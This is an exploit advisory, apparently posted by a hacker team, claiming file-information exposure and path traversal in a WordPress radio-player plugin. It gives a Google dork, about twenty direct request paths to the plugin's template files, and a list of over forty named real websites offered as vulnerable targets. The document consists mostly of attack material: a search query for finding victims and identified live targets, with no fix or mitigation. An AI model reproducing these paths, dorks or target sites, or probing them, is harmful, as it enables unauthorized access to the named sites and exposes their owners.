########################################################################################

# Exploit Title : WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 14/01/2019
# Vendor Homepage : lambertgroupproductions.com
# Software Download Link :
codecanyon.net/item/shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin/20667135
# Software Price : 21$
# Tested On : Windows and Linux
# Category : WebApps
# Affected Versions : From 3.0 To 4.9.x
# Exploit Risk : High
# Google Dorks : inurl:"/wp-content/plugins/lbg-audio8-html5-radio_ads/"
# Vulnerability Type : CWE-200 [ Information Exposure ]
# CWE-538 [ File and Directory Information Exposure ]
# CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]

########################################################################################

WordPress Plugin - SHOUT - HTML5 Radio Player With Ads - ShoutCast and IceCast Support

########################################################################################

# Impact :
***********

* WordPress lbg-audio8-html5-radio_ads 4.9.x and other versions are prone to an arbitrary file disclosure 

vulnerability because the plugin fails to properly sanitize user-supplied input.

* An attacker can exploit this vulnerability to view local files in the context of the web server process, 

which may aid in launching further attacks. 

* An information exposure is the intentional or unintentional disclosure 

of information to an actor that is not explicitly authorized to access that information.

* The product stores sensitive information in files or directories that are accessible 

to actors outside of the intended control sphere.

* The software uses external input to construct a pathname that is intended to identify a file or 

directory that is located underneath a restricted parent directory, but the software does not 

properly neutralize special elements within the pathname that can cause the pathname 

to resolve to a location that is outside of the restricted directory.

########################################################################################

# Exploit :
*************

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Playlist

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/banners.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/categories.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/help.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Add_New

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Help

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/players.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/playlist.php

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/preview.html

/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/settings_form.php

########################################################################################

Video Tutorials => 
*******************

Installation - youtube.com/watch?v=km5cVH-iH_8
How To Use The Player - youtube.com/watch?v=DVLHNopEpXw
Manage The Banners - youtube.com/watch?v=i4CWseyJmLc

########################################################################################

# Example Vulnerable Sites :
*************************

[+] radioekklesia.com/radio/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] novorio87fm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] skatemetalold.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] j-air.com.au/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] mediality.fr/glitter/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiouppermurray.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] soberforliferadio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiostudion.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiosuper.mobi/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] pamehellas.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] sociedadenewsfm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiopeniel.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] osmiumawards.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiomorabeza.cv/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] wwcufm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiopolis.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiost.com.br/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] patrola021.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] soleilfmbenin.com/sfm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] lawtudent.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] imprensamadureira.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] streaminginternacional.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] bandeando.fm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] mantenanews.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radio-varazdin.hr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] hostpa.com.br/siteum/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiocapital.cat/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] xn--aydnrehberi-1zb.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] gokiebox.pe/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radiotown.fi/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] tendenciafm.cl/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radio7.co.tz/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] radios.bolivia.bo/backup/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] goldenflash.be/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] nordestefmbrasilia.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] ucradio.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] ellinikos.live/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] princesafm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] djgrga-radio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] nococommunityradio.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] diocesedecaxiasdomaranhao.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

[+] umakiwefm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php

########################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

########################################################################################